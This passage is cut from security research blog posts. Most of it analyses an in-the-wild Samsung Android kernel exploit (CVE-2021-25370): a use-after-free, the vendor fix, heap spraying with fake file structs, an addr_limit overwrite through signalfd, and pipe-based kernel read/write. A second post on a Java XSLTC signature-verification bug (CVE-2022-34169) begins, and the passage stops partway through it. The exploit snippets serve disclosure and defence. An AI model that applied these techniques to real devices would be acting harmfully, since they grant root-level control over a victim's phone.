The function then calls fd_install(win_data->retire_fence, sync_file->file) which means that userspace can now access the fd. When fd_install is called, another reference is not taken on the file so when userspace calls close(fd), the only reference on the file is dropped and the file struct is freed. The issue is that after calling fd_install the function then calls decon_create_release_fences(decon, win_data, sync_file) with the same sync_file that contains the pointer to the freed file struct. 


void decon_create_release_fences(struct decon_device *decon,

                struct decon_win_config_data *win_data,

                struct sync_file *sync_file)

{

        int i = 0;


        for (i = 0; i < decon->dt.max_win; i++) {

                int state = win_data->config[i].state;

                int rel_fence = -1;


                if (state == DECON_WIN_STATE_BUFFER) {

                        rel_fence = decon_get_valid_fd();

                        if (rel_fence < 0) {

                                decon_err("%s: failed to get unused fd\n",

                                                __func__);

                                goto err;

                        }


                        fd_install(rel_fence, get_file(sync_file->file));

                }

                win_data->config[i].rel_fence = rel_fence;

        }

        return;

err:

        while (i-- > 0) {

                if (win_data->config[i].state == DECON_WIN_STATE_BUFFER) {

                        put_unused_fd(win_data->config[i].rel_fence);

                        win_data->config[i].rel_fence = -1;

                }

        }

        return;

}


decon_create_release_fences gets a new fd, but then associates that new fd with the freed file struct, sync_file->file, in the call to fd_install.


When decon_set_win_config returns, retire_fence is the closed fd that points to the freed file struct and rel_fence is the open fd that points to the freed file struct.

Fixing the vulnerability

Samsung fixed this use-after-free in March 2021 as CVE-2021-25370. The fix was to move the call to fd_install in decon_set_win_config to the latest possible point in the function after the call to decon_create_release_fences.


        if (num_of_window) {

-               fd_install(win_data->retire_fence, sync_file->file);

                decon_create_release_fences(decon, win_data, sync_file);

#if !defined(CONFIG_SUPPORT_LEGACY_FENCE)

                regs->retire_fence = dma_fence_get(sync_file->fence);

#endif

        }


        decon_hiber_block(decon);


        mutex_lock(&decon->up.lock);

        list_add_tail(&regs->list, &decon->up.list);

+       atomic_inc(&decon->up.remaining_frame);

        decon->update_regs_list_cnt++;

+       win_data->extra.remained_frames = atomic_read(&decon->up.remaining_frame);


        mutex_unlock(&decon->up.lock);

        kthread_queue_work(&decon->up.worker, &decon->up.work);


+       /*

+        * The code is moved here because the DPU driver may get a wrong fd

+        * through the released file pointer,

+        * if the user(HWC) closes the fd and releases the file pointer.

+        *

+        * Since the user land can use fd from this point/time,

+        * it can be guaranteed to use an unreleased file pointer

+        * when creating a rel_fence in decon_create_release_fences(...)

+        */

+       if (num_of_window)

+               fd_install(win_data->retire_fence, sync_file->file);


        mutex_unlock(&decon->lock);

Heap Grooming and Spray

To groom the heap the exploit first opens and closes 30,000+ files using memfd_create. Then, the exploit sprays the heap with fake file structs. On this version of the Samsung kernel, the file struct is 0x140 bytes. In these new, fake file structs, the exploit sets four of the members:


fake_file.f_u = 0x1010101;

fake_file.f_op = kaddr - 0x2071B0+0x1094E80;

fake_file.f_count = 0x7F;

fake_file.private_data = addr_limit_ptr;


The f_op member is set to the signalfd_op for reasons we will cover below in the “Overwriting the addr_limit” section. kaddr is the address leaked using vulnerability #2 described previously. The addr_limit_ptr was calculated by adding 8 to the task_struct address also leaked using vulnerability #2.


The exploit sprays 25 of these structs across the heap using the MEM_PROFILE_ADD ioctl in the Mali driver. 

/**

 * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel

 * @buffer: Pointer to the information

 * @len: Length

 * @padding: Padding

 *

 * The data provided is accessible through a debugfs file

 */

struct kbase_ioctl_mem_profile_add {

        __u64 buffer;

        __u32 len;

        __u32 padding;

};


#define KBASE_ioctl_MEM_PROFILE_ADD \

        _IOW(KBASE_ioctl_TYPE, 27, struct kbase_ioctl_mem_profile_add)


static int kbase_api_mem_profile_add(struct kbase_context *kctx,

                struct kbase_ioctl_mem_profile_add *data)

{

        char *buf;

        int err;


        if (data->len > KBASE_MEM_PROFILE_MAX_BUF_SIZE) {

                dev_err(kctx->kbdev->dev, "mem_profile_add: buffer too big\n");

                return -EINVAL;

        }


        buf = kmalloc(data->len, GFP_KERNEL);

        if (ZERO_OR_NULL_PTR(buf))

                return -ENOMEM;


        err = copy_from_user(buf, u64_to_user_ptr(data->buffer),

                        data->len);

        if (err) {

                kfree(buf);

                return -EFAULT;

        }


        return kbasep_mem_profile_debugfs_insert(kctx, buf, data->len);

}



This ioctl takes a pointer to a buffer, the length of the buffer, and padding as arguments. kbase_api_mem_profile_add will allocate a buffer on the kernel heap and then will copy the passed buffer from userspace into the newly allocated kernel buffer.


Finally, kbase_api_mem_profile_add calls kbasep_mem_profile_debugfs_insert. This technique only works when the device is running a kernel with CONFIG_DEBUG_FS enabled. The purpose of the MEM_PROFILE_ADD ioctl is to write a buffer to DebugFS. As of Android 11, DebugFS should not be enabled on production devices. Whenever Android launches new requirements like this, it only applies to devices launched on that new version of Android. Android 11 launched in September 2020 and the exploit was found in November 2020 so it makes sense that the exploit targeted devices Android 10 and before where DebugFS would have been mounted.


Screenshot of the DebugFS section from https://source.android.com/docs/setup/about/android-11-release#debugfs.  The highlighted text reads: "Android 11 removes platform support for DebugFS and requires that it not be mounted or accessed on production devices"


For example, on the A51 exynos device (SM-A515F) which launched on Android 10, both CONFIG_DEBUG_FS is enabled and DebugFS is mounted. 


a51:/ $ getprop ro.build.fingerprint

samsung/a51nnxx/a51:11/RP1A.200720.012/A515FXXU4DUB1:user/release-keys

a51:/ $ getprop ro.build.version.security_patch

2021-02-01

a51:/ $ uname -a

Linux localhost 4.14.113-20899478 #1 SMP PREEMPT Mon Feb 1 15:37:03 KST 2021 aarch64

a51:/ $ cat /proc/config.gz | gunzip | cat | grep CONFIG_DEBUG_FS                                                                          

CONFIG_DEBUG_FS=y


a51:/ $ cat /proc/mounts | grep debug                                                                                                      

/sys/kernel/debug /sys/kernel/debug debugfs rw,seclabel,relatime 0 0


Because DebugFS is mounted, the exploit is able to use the MEM_PROFILE_ADD ioctl to groom the heap. If DebugFS wasn’t enabled or mounted, kbasep_mem_profile_debugfs_insert would simply free the newly allocated kernel buffer and return.


#ifdef CONFIG_DEBUG_FS


int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,

                                        size_t size)

{

        int err = 0;


        mutex_lock(&kctx->mem_profile_lock);


        dev_dbg(kctx->kbdev->dev, "initialised: %d",

                kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED));


        if (!kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED)) {

                if (IS_ERR_OR_NULL(kctx->kctx_dentry)) {

                        err  = -ENOMEM;

                } else if (!debugfs_create_file("mem_profile", 0444,

                                        kctx->kctx_dentry, kctx,

                                        &kbasep_mem_profile_debugfs_fops)) {

                        err = -EAGAIN;

                } else {

                        kbase_ctx_flag_set(kctx,

                                           KCTX_MEM_PROFILE_INITIALIZED);

                }

        }


        if (kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED)) {

                kfree(kctx->mem_profile_data);

                kctx->mem_profile_data = data;

                kctx->mem_profile_size = size;

        } else {

                kfree(data);

        }


        dev_dbg(kctx->kbdev->dev, "returning: %d, initialised: %d",

                err, kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED));


        mutex_unlock(&kctx->mem_profile_lock);


        return err;

}



#else /* CONFIG_DEBUG_FS */


int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,

                                        size_t size)

{

        kfree(data);

        return 0;

}

#endif /* CONFIG_DEBUG_FS */


By writing the fake file structs as a singular 0x2000 size buffer rather than as 25 individual 0x140 size buffers, the exploit will be writing their fake structs to two whole pages which increases the odds of reallocating over the freed file struct.


The exploit then calls dup2 on the dangling FD’s. The dup2 syscall will open another fd on the same open file structure that the original points to. In this case, the exploit is calling dup2 to verify that they successfully reallocated a fake file structure in the same place as the freed file structure. dup2 will increment the reference count (f_count) in the file structure. In all of our fake file structures, the f_count was set to 0x7F. So if any of them are incremented to 0x80, the exploit knows that it successfully reallocated over the freed file struct.


To determine if any of the file struct’s refcounts were incremented, the exploit iterates through each of the directories under /sys/kernel/debug/mali/mem/ and reads each directory’s mem_profile contents. If it finds the byte 0x80, then it knows that it successfully reallocated the freed struct and that the f_count of the fake file struct was incremented.

Overwriting the addr_limit

Like many previous Android exploits, to gain arbitrary kernel read and write, the exploit overwrites the kernel address limit (addr_limit). The addr_limit defines the address range that the kernel may access when dereferencing userspace pointers. For userspace threads, the addr_limit is usually USER_DS or 0x7FFFFFFFFF. For kernel threads, it’s usually KERNEL_DS or 0xFFFFFFFFFFFFFFFF.  


Userspace operations only access addresses below the addr_limit. Therefore, by raising the addr_limit by overwriting it, we will make kernel memory accessible to our unprivileged process. The exploit uses the syscall signalfd with the dangling fd to do this.


signalfd(dangling_fd, 0xFFFFFF8000000000, 8);


According to the man pages, the syscall signalfd is:

signalfd() creates a file descriptor that can be used to accept signals targeted at the caller.  This provides an alternative to the use of a signal handler or sigwaitinfo(2), and has the advantage that the file descriptor may be monitored by select(2), poll(2), and epoll(7).


int signalfd(int fd, const sigset_t *mask, int flags);


The exploit called signalfd on the file descriptor that was found to replace the freed one in the previous step. When signalfd is called on an existing file descriptor, only the mask is updated based on the mask passed as the argument, which gives the exploit an 8-byte write to the signmask of the signalfd_ctx struct.. 


typedef unsigned long sigset_t;


struct signalfd_ctx {

        sigset_t sigmask;

};


The file struct includes a field called private_data that is a void *. File structs for signalfd file descriptors store the pointer to the signalfd_ctx struct in the private_data field. As shown above, the signalfd_ctx struct is simply an 8 byte structure that contains the mask.


Let’s walk through how the signalfd source code updates the mask: 


SYSCALL_DEFINE4(signalfd4, int, ufd, sigset_t __user *, user_mask,

                size_t, sizemask, int, flags)

{

        sigset_t sigmask;

        struct signalfd_ctx *ctx;


        /* Check the SFD_* constants for consistency.  */

        BUILD_BUG_ON(SFD_CLOEXEC != O_CLOEXEC);

        BUILD_BUG_ON(SFD_NONBLOCK != O_NONBLOCK);


        if (flags & ~(SFD_CLOEXEC | SFD_NONBLOCK))

                return -EINVAL;


        if (sizemask != sizeof(sigset_t) ||

            copy_from_user(&sigmask, user_mask, sizeof(sigmask)))

               return -EINVAL;

        sigdelsetmask(&sigmask, sigmask(SIGKILL) | sigmask(SIGSTOP));

        signotset(&sigmask);                                      // [1]


        if (ufd == -1) {                                          // [2]

                ctx = kmalloc(sizeof(*ctx), GFP_KERNEL);

                if (!ctx)

                        return -ENOMEM;


                ctx->sigmask = sigmask;


                /*

                 * When we call this, the initialization must be complete, since

                 * anon_inode_getfd() will install the fd.

                 */

                ufd = anon_inode_getfd("[signalfd]", &signalfd_fops, ctx,

                                       O_RDWR | (flags & (O_CLOEXEC | O_NONBLOCK)));

                if (ufd < 0)

                        kfree(ctx);

        } else {                                                 // [3]

                struct fd f = fdget(ufd);

                if (!f.file)

                        return -EBADF;

                ctx = f.file->private_data;                      // [4]

                if (f.file->f_op != &signalfd_fops) {            // [5]

                        fdput(f);

                        return -EINVAL;

                }

                spin_lock_irq(&current->sighand->siglock);

                ctx->sigmask = sigmask;                         // [6] WRITE!

                spin_unlock_irq(&current->sighand->siglock);


                wake_up(&current->sighand->signalfd_wqh);

                fdput(f);

        }


        return ufd;

}


First the function modifies the mask that was passed in. The mask passed into the function is the signals that should be accepted via the file descriptor, but the sigmask member of the signalfd struct represents the signals that should be blocked. The sigdelsetmask and signotset calls at [1] makes this change. The call to sigdelsetmask ensures that the SIG_KILL and SIG_STOP signals are always blocked so it clears bit 8 (SIG_KILL) and bit 18 (SIG_STOP) in order for them to be set in the next call. Then signotset flips each bit in the mask. The mask that is written is ~(mask_in_arg & 0xFFFFFFFFFFFBFEFF)


The function checks whether or not the file descriptor passed in is -1 at [2]. In this exploit’s case it’s not so we fall into the else block at [3]. At [4] the signalfd_ctx* is set to the private_data pointer. 


The signalfd manual page also says that the fd argument “must specify a valid existing signalfd file descriptor”. To verify this, at [5] the syscall checks if the underlying file’s f_op equals the signalfd_ops. This is why the f_op was set to signalfd_ops in the previous section. Finally at [6], the overwrite occurs. The user provided mask is written to the address in private_data. In the exploit’s case, the fake file struct’s private_data was set to the addr_limit pointer. So when the mask is written, we’re actually overwriting the addr_limit.


The exploit calls signalfd with a mask argument of 0xFFFFFF8000000000. So the value ~(0xFFFFFF8000000000 & 0xFFFFFFFFFFFCFEFF) = 0x7FFFFFFFFF, also known as USER_DS. We’ll talk about why they’re overwriting the addr_limit as USER_DS rather than KERNEL_DS in the next section. 

Working Around UAO and PAN

“User-Access Override” (UAO) and “Privileged Access Never” (PAN) are two exploit mitigations that are commonly found on modern Android devices. Their kernel configs are CONFIG_ARM64_UAO and CONFIG_ARM64_PAN. Both PAN and UAO are hardware mitigations released on ARMv8 CPUs. PAN protects against the kernel directly accessing user-space memory. UAO works with PAN by allowing unprivileged load and store instructions to act as privileged load and store instructions when the UAO bit is set.


It’s often said that the addr_limit overwrite technique detailed above doesn’t work on devices with UAO and PAN turned on. The commonly used addr_limit overwrite technique was to change the addr_limit to a very high address, like 0xFFFFFFFFFFFFFFFF (KERNEL_DS), and then use a pair of pipes for arbitrary kernel read and write. This is what Jann and I did in our proof-of-concept for CVE-2019-2215 back in 2019. Our kernel_write function is shown below.


void kernel_write(unsigned long kaddr, void *buf, unsigned long len) {

  errno = 0;

  if (len > 0x1000) errx(1, "kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);

  if (write(kernel_rw_pipe[1], buf, len) != len) err(1, "kernel_write failed to load userspace buffer");

  if (read(kernel_rw_pipe[0], (void*)kaddr, len) != len) err(1, "kernel_write failed to overwrite kernel memory");

}


This technique works by first writing the pointer to the buffer of the contents that you’d like written to one end of the pipe. By then calling a read and passing in the kernel address you’d like to write to, those contents are then written to that kernel memory address.


With UAO and PAN enabled, if the addr_limit is set to KERNEL_DS and we attempt to execute this function, the first write call will fail because buf is in user-space memory and PAN prevents the kernel from accessing user space memory.


Let’s say we didn’t set the addr_limit to KERNEL_DS (-1) and instead set it to -2, a high kernel address that’s not KERNEL_DS. PAN wouldn’t be enabled, but neither would UAO. Without UAO enabled, the unprivileged load and store instructions are not able to access the kernel memory.


The way the exploit works around the constraints of UAO and PAN is pretty straightforward: the exploit switches the addr_limit between USER_DS and KERNEL_DS based on whether it needs to access user space or kernel space memory. As shown in the uao_thread_switch function below, UAO is enabled when addr_limit == KERNEL_DS and is disabled when it does not.


/* Restore the UAO state depending on next's addr_limit */

void uao_thread_switch(struct task_struct *next)

{

        if (IS_ENABLED(CONFIG_ARM64_UAO)) {

                if (task_thread_info(next)->addr_limit == KERNEL_DS)

                        asm(ALTERNATIVE("nop", SET_PSTATE_UAO(1), ARM64_HAS_UAO));

                else

                        asm(ALTERNATIVE("nop", SET_PSTATE_UAO(0), ARM64_HAS_UAO));

        }

}


The exploit was able to use this technique of toggling the addr_limit between USER_DS and KERNEL_DS because they had such a good primitive from the use-after-free and could reliably and repeatedly write a new value to the addr_limit by calling signalfd. The exploit’s function to write to kernel addresses is shown below:


kernel_write(void *kaddr, const void *buf, unsigned long buf_len)

{

  unsigned long USER_DS = 0x7FFFFFFFFF;

  write(kernel_rw_pipe2, buf, buf_len);                   // [1]

  write(kernel_rw_pipe2, &USER_DS, 8u);                   // [2]

  set_addr_limit_to_KERNEL_DS();                          // [3]             

  read(kernel_rw_pipe, kaddr, buf_len);                   // [4]

  read(kernel_rw_pipe, addr_limit_ptr, 8u);               // [5]

}


The function takes three arguments: the kernel address to write to (kaddr), a pointer to the buffer of contents to write (buf), and the length of the buffer (buf_len). buf is in userspace. When the kernel_write function is entered, the addr_limit is currently set to USER_DS. At [1] the exploit writes the buffer pointer to the pipe. A pointer to the USER_DS value is written to the pipe at [2].


The set_addr_limit_to_KERNEL_DS function at [3] sends a signal to tell another process in the exploit to call signalfd with a mask of 0. Because signalfd performs a NOT on the bits provided in the mask in signotset, the value 0xFFFFFFFFFFFFFFFF (KERNEL_DS) is written to the addr_limit


Now that the addr_limit is set to KERNEL_DS the exploit can access kernel memory. At [4], the exploit reads from the pipe, writing the contents to kaddr. Then at [5] the exploit returns addr_limit back to USER_DS by reading the value from the pipe that was written at [2] and writing it back to the addr_limit. The exploit’s function to read from kernel memory is the mirror image of this function.


I deliberately am not calling this a bypass because UAO and PAN are acting exactly as they were designed to act: preventing the kernel from accessing user-space memory. UAO and PAN were not developed to protect against arbitrary write access to the addr_limit

Post-exploitation

The exploit now has arbitrary kernel read and write. It then follows the steps as seen in most other Android exploits: overwrite the cred struct for the current process and overwrite the loaded SELinux policy to change the current process’s context to vold. vold is the “Volume Daemon” which is responsible for mounting and unmounting of external storage. vold runs as root and while it's a userspace service, it’s considered kernel-equivalent as described in the Android documentation on security contexts. Because it’s a highly privileged security context, it makes a prime target for changing the SELinux context to.


Screen shot of the "OS Kernel" section from https://source.android.com/docs/security/overview/updates-resources#process_types. It says:  Functionality that: - is part of the kernel - runs in the same CPU context as the kernel (for example, device drivers) - has direct access to kernel memory (for example, hardware components on the device) - has the capability to load scripts into a kernel component (for example, eBPF) - is one of a handful of user services that's considered kernel equivalent (such as, apexd, bpfloader, init, ueventd, and vold).


As stated at the beginning of this post, the sample obtained was discovered in the preparatory stages of the attack. Unfortunately, it did not include the final payload that would have been deployed with this exploit.

Conclusion

This in-the-wild exploit chain is a great example of different attack surfaces and “shape” than many of the Android exploits we’ve seen in the past. All three vulnerabilities in this chain were in the manufacturer’s custom components rather than in the AOSP platform or the Linux kernel. It’s also interesting to note that 2 out of the 3 vulnerabilities were logic and design vulnerabilities rather than memory safety. Of the 10 other Android in-the-wild 0-days that we’ve tracked since mid-2014, only 2 of those were not memory corruption vulnerabilities.


The first vulnerability in this chain, the arbitrary file read and write, CVE-2021-25337, was the foundation of this chain, used 4 different times and used at least once in each step. The vulnerability was in the Java code of a custom content provider in the system_server. The Java components in Android devices don’t tend to be the most popular targets for security researchers despite it running at such a privileged level. This highlights an area for further research.


Labeling when vulnerabilities are known to be exploited in-the-wild is important both for targeted users and for the security industry. When in-the-wild 0-days are not transparently disclosed, we are not able to use that information to further protect users, using patch analysis and variant analysis, to gain an understanding of what attackers already know. 


The analysis of this exploit chain has provided us with new and important insights into how attackers are targeting Android devices. It highlights a need for more research into manufacturer specific components. It shows where we ought to do further variant analysis. It is a good example of how Android exploits can take many different “shapes” and so brainstorming different detection ideas is a worthwhile exercise. But in this case, we’re at least 18 months behind the attackers: they already know which bugs they’re exploiting and so when this information is not shared transparently, it leaves defenders at a further disadvantage. 


This transparent disclosure of in-the-wild status is necessary for both the safety and autonomy of targeted users to protect themselves as well as the security industry to work together to best prevent these 0-days in the future.


Gregor Samsa: Exploiting Java's XML Signature Verification

2 November 2022 at 11:41

By Felix Wilhelm, Project Zero


Earlier this year, I discovered a surprising attack surface hidden deep inside Java’s standard library: A custom JIT compiler processing untrusted XSLT programs, exposed to remote attackers during XML signature verification. This post discusses CVE-2022-34169, an integer truncation bug in this JIT compiler resulting in arbitrary code execution in many Java-based web applications and identity providers that support the SAML single-sign-on standard. 

OpenJDK fixed the discussed issue in July 2022. The Apache BCEL project used by Xalan-J, the origin of the vulnerable code, released a patch in September 2022


While the vulnerability discussed in this post has been patched , vendors and users should expect further vulnerabilities in SAML.


From a security researcher's perspective, this vulnerability is an example of an integer truncation issue in a memory-safe language, with an exploit that feels very much like a memory corruption. While less common than the typical memory safety issues of C or C++ codebases, weird machines still exist in memory safe languages and will keep us busy even after we move into a bright memory safe future.


Before diving into the vulnerability and its exploit, I’m going to give a quick overview of XML signatures and SAML. What makes XML signatures such an interesting target and why should we care about them?

Introduction


XML Signatures are a typical example of a security protocol invented in the early 2000’s. They suffer from high complexity, a large attack surface and a wealth of configurable features that can weaken or break its security guarantees in surprising ways. Modern usage of XML signatures is mostly restricted to somewhat obscure protocols and legacy applications, but there is one important exception: SAML. SAML, which stands for Security Assertion Markup Language, is one of the two main Single-Sign-On standards used in modern web applications. While its alternative, the OAuth based OpenID Connect (OIDC) is gaining popularity, SAML is still the de-facto standard for large enterprises and complex integrations. 


SAML relies on XML signatures to protect messages forwarded through the browser. This turns XML signature verification into a very interesting external attack surface for attacking modern multi-tenant SaaS applications. While you don’t need a detailed understanding of SAML to follow this post, interested readers can take a look at Okta's Understanding SAML writeup or the SAML 2.0 wiki entry to get a better understanding of the protocol.


SAML SSO logins work by exchanging XML documents between the application, known as service provider (SP), and the identity provider (IdP). When a user tries to login to an SP, the service provider creates a SAML request. The IdP looks at the SAML request, tries to authenticate the user and sends a SAML response back to the SP. A successful response will contain information about the user, which the application can then use to grant access to its resources. 


In the most widely used SAML flow (known as SP Redirect Bind / IdP POST Response) these documents are forwarded through the user's browser using HTTP redirects and POST requests. To protect against modification by the user, the security critical part of the SAML response (known as Assertion) has to be cryptographically signed by the IdP. In addition, the IdP might require SPs to also sign the SAML request to protect against impersonation attacks.

This means that both the IdP and the SP have to parse and verify XML signatures passed to them by a potential malicious actor. Why is this a problem? Let's take a closer look at the way XML signatures work:


XML Signatures


Most signature schemes operate on a raw byte stream and sign the data as seen on the wire. Instead, the XML signature standard (known as XMLDsig) tries to be robust against insignificant changes to the signed XML document. This means that changing whitespaces, line endings or comments in a signed document should not invalidate its signature. 


An XML signature consists of a special Signature element, an example of which is shown below:

<Signature>

  <SignedInfo>

    <CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>

    <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1" />

    <Reference URI="#signed-data">

       <Transforms>

       …

       </Transforms>

       <DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1" />

       <DigestValue>9bc34549d565d9505b287de0cd20ac77be1d3f2c</DigestValue>

    </Reference>

  </SignedInfo>

  <SignatureValue>....</SignatureValue>

  <KeyInfo><X509Certificate>....</X509Certificate></KeyInfo>

</Signature>


  • The  SignedInfo child contains  CanonicalizationMethod and SignatureMethod elements as well as one or more Reference elements describing the integrity protected data. 

  • KeyInfo describes the signer key and can contain a raw public key, a X509 certificate or just a key id. 

  • SignatureValue contains the cryptographic signature (using SignatureMethod) of the SignedInfo element after it has been canonicalized using CanonicalizationMethod


At this point, only the integrity of the SignedInfo element is protected. To understand how this protection is extended to the actual data, we need to take a look at the way Reference elements work: In theory the Reference URI attribute can either point to an external document (detached signature), an element embedded as a child (enveloping signature) or any element in the outer document (enveloped signature). In practice, most SAML implementations use enveloped signatures and the Reference URI will point to the signed element somewhere in the current document tree.


When a Reference is processed during verification or signing, the referenced content is passed through a chain of Transforms. XMLDsig supports a number of transforms ranging from canonicalization, over base64 decoding to XPath or even XSLT. Once all transforms have been processed the resulting byte stream is passed into the cryptographic hash function specified with the DigestMethod element and the result is stored in DigestValue

This way, as the whole Reference element is part of SignedInfo, its integrity protection gets extended to the referenced element as well. 


Validating a XML signature can therefore be split into two separate steps:

  • Reference Validation: Iterate through all embedded references and for each reference fetch the referenced data, pump it through the Transforms chain and calculate its hash digest. Compare the calculated Digest with the stored DigestValue and fail if they differ.

  • Signature Validation: First canonicalize the SignedInfo element using the specified CanonicalizationMethod algorithm. Calculate the signature of SignedInfo using the algorithm specified in SignatureMethod and the signer key described in KeyInfo. Compare the result with SignatureValue and fail if they differ.


Interestingly, the order of these two steps can be implementation specific. While the XMLDsig RFC lists Reference Validation as the first step, performing Signature Validation first can have security advantages as we will see later on.


Correctly validating XML signatures and making sure the data we care about is protected, is very difficult in the context of SAML. This will be a topic for later blog posts, but at this point we want to focus on the reference validation step:


As part of this step, the application verifying a signature has to run attacker controlled transforms on attacker controlled input. Looking at the list of transformations supported by XMLDsig, one seems particularly interesting: XSLT. 


XSLT, which stands for Extensible Stylesheet Language Transformations, is a feature-rich XML based programming language designed for transforming XML documents. Embedding a XSLT transform in a XML signature means that the verifier has to run the XSLT program on the referenced XML data. 


The code snippet below gives you an example of a simple XSLT transformation. When executed it fetches each <data> element stored inside <input>, grabs the first character of its content and returns it as part of its <output>. So <input><data>abc</data><data>def</data></input> would be transformed into <output><data>a</data><data>d</data></output>

<Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">

  <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"

   xmlns="http://www.w3.org/TR/xhtml1/strict" exclude-result-prefixes="foo"   

   version="1.0">

   <xsl:output encoding="UTF-8" indent="no" method="xml" />

   <xsl:template match="/input">

                    <output>

                          <xsl:for-each select="data">

                              <data><xsl:value-of select="substring(.,1,1)" /></data>

                          </xsl:for-each>

                    </output>

  </xsl:template>

 </xsl:stylesheet>

</Transform>


Exposing a fully-featured language runtime to an external attacker seems like a bad idea, so let's take a look at how this feature is implemented in Java’s OpenJDK.


XSLT in Java


Java’s main interface for working with XML signatures is the java.xml.crypto.XMLSignature class and its sign and validate methods. We are mostly interested in the validate method which is shown below:


// https://github.com/openjdk/jdk/blob/master/src/java.xml.crypto/share/classes/org/jcp/xml/dsig/internal/dom/DOMXMLSignature.java

@Override

    public boolean validate(XMLValidateContext vc)

        throws XMLSignatureException

    {

        [..]

        // validate the signature

        boolean sigValidity = sv.validate(vc); (A)

        if (!sigValidity) {

            validationStatus = false;

            validated = true;

            return validationStatus;

        }


        // validate all References

        @SuppressWarnings("unchecked")

        List<Reference> refs = this.si.getReferences();

        boolean validateRefs = true;

        for (int i = 0, size = refs.size(); validateRefs && i < size; i++) {

            Reference ref = refs.get(i);

            boolean refValid = ref.validate(vc); (B)

            LOG.debug("Reference [{}] is valid: {}", ref.getURI(), refValid);

            validateRefs &= refValid;

        }

        if (!validateRefs) {

            LOG.debug("Couldn't validate the References");

            validationStatus = false;

            validated = true;

            return validationStatus;

        } 

   [..]

   }


As we can see, the validate method first validates the signature of the SignedInfo element in (A) before validating all the references in (B).  This means that an attack against the XSLT runtime will require a valid signature for the SignedInfo element and we’ll discuss later how an attacker can bypass this requirement.


The call to ref.validate() in (B) ends up in the DomReference.validate method shown below:

public boolean validate(XMLValidateContext validateContext)

        throws XMLSignatureException

    {

        if (validateContext == null) {

            throw new NullPointerException("validateContext cannot be null");

        }

        if (validated) {

            return validationStatus;

        }

        Data data = dereference(validateContext); (D)

        calcDigestValue = transform(data, validateContext); (E)


        [..]

        validationStatus = Arrays.equals(digestValue, calcDigestValue); (F)

        validated = true;

        return validationStatus;

    }




The code gets the referenced data in (D), transforms it in (E) and compares the digest of the result with the digest stored in the signature in (F). Most of the complexity is hidden behind the call to transform in (E) which loops through all Transform elements defined in the Reference and executes them.


As this is Java, we have to walk through a lot of indirection layers before we end up at the interesting parts. Take a look at the call stack below if you want to follow along and step through the code:


at com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer(TemplatesImpl.java:584) at com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl.newTransformer(TransformerFactoryImpl.java:818) at com.sun.org.apache.xml.internal.security.transforms.implementations.TransformXSLT.enginePerformTransform(TransformXSLT.java:130) at com.sun.org.apache.xml.internal.security.transforms.Transform.performTransform(Transform.java:316) at org.jcp.xml.dsig.internal.dom.ApacheTransform.transformIt(ApacheTransform.java:188) at org.jcp.xml.dsig.internal.dom.ApacheTransform.transform(ApacheTransform.java:124) at org.jcp.xml.dsig.internal.dom.DOMTransform.transform(DOMTransform.java:173) at org.jcp.xml.dsig.internal.dom.DOMReference.transform(DOMReference.java:457) at org.jcp.xml.dsig.internal.dom.DOMReference.validate(DOMReference.java:387) at org.jcp.xml.dsig.internal.dom.DOMXMLSignature.validate(DOMXMLSignature.java:281)


If we specify a XSLT transform and the org.jcp.xml.dsig.secureValidation property isn't enabled (we’ll come back to this later) we will end up in the file src/java.xml/share/classes/com/sun/org/apache/xalan/internal/xsltc/trax/TransformerFactoryImpl.java which is part of a module called XSLTC.


XSLTC, the XSLT compiler, is originally part of the Apache Xalan project. OpenJDK forked Xalan-J, a Java based XSLT runtime, to provide XSLT support as part of Java’s standard library. While the original Apache project has a number of features that are not supported in the OpenJDK fork, most of the core code is identical and CVE-2022-34169 affected both codebases. 


XSLTC is responsible for compiling XSLT stylesheets into Java classes to improve performance compared to a naive interpretation based approach. While this has advantages when repeatedly running the same stylesheet over large amounts of data, it is a somewhat surprising choice in the context of XML signature validation. Thinking about this from an attacker's perspective, we can now provide arbitrary inputs to a fully-featured JIT compiler. Talk about an unexpected attack surface! 


A bug in XSLTC

    /**

     * As Gregor Samsa awoke one morning from uneasy dreams he found himself

     * transformed in his bed into a gigantic insect. He was lying on his hard,

     * as it were armour plated, back, and if he lifted his head a little he

     * could see his big, brown belly divided into stiff, arched segments, on

     * top of which the bed quilt could hardly keep in position and was about

     * to slide off completely. His numerous legs, which were pitifully thin

     * compared to the rest of his bulk, waved helplessly before his eyes.

     * "What has happened to me?", he thought. It was no dream....

     */

    protected final static String DEFAULT_TRANSLET_NAME = "GregorSamsa";

Turns out that the author of this codebase was a Kafka fan. 


So what does this compilation process look like? XSLTC takes a XSLT stylesheet as input and returns a JIT'ed Java class, called translet, as output. The JVM then loads this class, constructs it and the XSLT runtime executes the transformation via a JIT'ed method. 


Java class files contain the JVM bytecode for all class methods, a so-called constant pool describing all constants used and other important runtime details such as the name of its super class or access flags. 


// https://docs.oracle.com/javase/specs/jvms/se18/html/jvms-4.html

ClassFile {

    u4             magic;

    u2             minor_version;

    u2             major_version;

    u2             constant_pool_count;

    cp_info        constant_pool[constant_pool_count-1]; // cp_info is a variable-sized object

    u2             access_flags;

    u2             this_class;

    u2             super_class;

    u2             interfaces_count;

    u2             interfaces[interfaces_count];

    u2             fields_count;

    field_info     fields[fields_count];

    u2             methods_count;

    method_info    methods[methods_count];

    u2             attributes_count;

    attribute_info attributes[attributes_count];

}


